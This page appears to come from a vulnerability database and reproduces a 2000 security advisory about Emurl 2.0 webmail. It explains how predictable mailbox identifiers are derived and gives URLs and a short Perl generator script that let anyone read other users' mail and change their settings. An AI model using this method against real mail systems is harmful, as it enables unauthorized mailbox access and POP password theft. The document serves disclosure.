Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

Emurl2.0.windows

🗓️ 17 May 2000 00:00:00Reported by Packet StormType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 22 Views

Emurl 2.0 allows unauthorized mailbox access and POP password theft via predictable identifiers.

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`Affected Product: Emurl 2.0 For Windows NT 4.0 (possibly others)  
  
Product information: Emurl is web-based email host developped by SeattleLab.  
http://www1.seattlelab.com/emurl/  
  
Impact: Users can access the mailbox's content of anybody on the system.  
They can also steal their POP passwords since Emurl allows you to fetch your  
POP email from more than one source.  
  
Description:  
After logging into my new mail account powered by the Emurl software, this  
URL struck me:  
  
http://www.somesite.com/scripts/emurl/RECMAN.dll?TYPE=RECIEVEMAIL&USER=113100104114116111123  
  
I guess you all know where this is going. First, this identifier is based  
solely on your account name. Therefore, if you create an account with the  
same name on another site, you'll end up with the very same identifier.  
  
Furthermore, this identifier can easily be determined since it is "encoded"  
using the ascii value of each character of the account's name and  
incremented by its position.  
  
In this example, my user ID would be PBenoit and my resulting identifier  
would be 113100104114116111123.  
  
p = 112 + 1 = 113  
b = 98 + 2 = 100  
e = 101 + 3 = 104  
n = 110 + 4 = 114  
o = 111 + 5 = 116  
i = 105 + 6 = 111  
t = 116 + 7 = 123  
  
You could fetch the e-mails here  
  
http://www.somesite.com/scripts/emurl/RECMAN.dll?TYPE=RECIEVEMAIL&USER=<identifier>  
  
... and view/change the account's settings here  
  
http://www.somesite.com/scripts/emurl/MAKEHTML_M.dll?TYPE=USER&USER=<identifier>  
  
I threw a few lines of perl together to generate this.  
  
print "Enter your ID: ";  
$_=lc(<STDIN>); chomp;  
print "Your identifier is: ";  
@letters=split(//, $_);  
for ($i = 0; $i < length($_); $i++) {  
$mychar = ord($letters[$i])+$i+1;  
if ($mychar < 100)  
{ $mychar = (0).$mychar;}  
print $mychar  
}  
  
  
Vendor status: SeattleLab is aware and the issue is addressed in their next  
version.  
  
______________________________________________  
FREE Personalized Email at Mail.com  
Sign up at http://www.mail.com/?sr=signup  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
17 May 2000 00:00Current
7.4High risk
Vulners AI Score7.4
emurl 2.0windows nt 4.0mailbox accesspop password theftidentifier vulnerabilityseattlelab.
22
.json
Report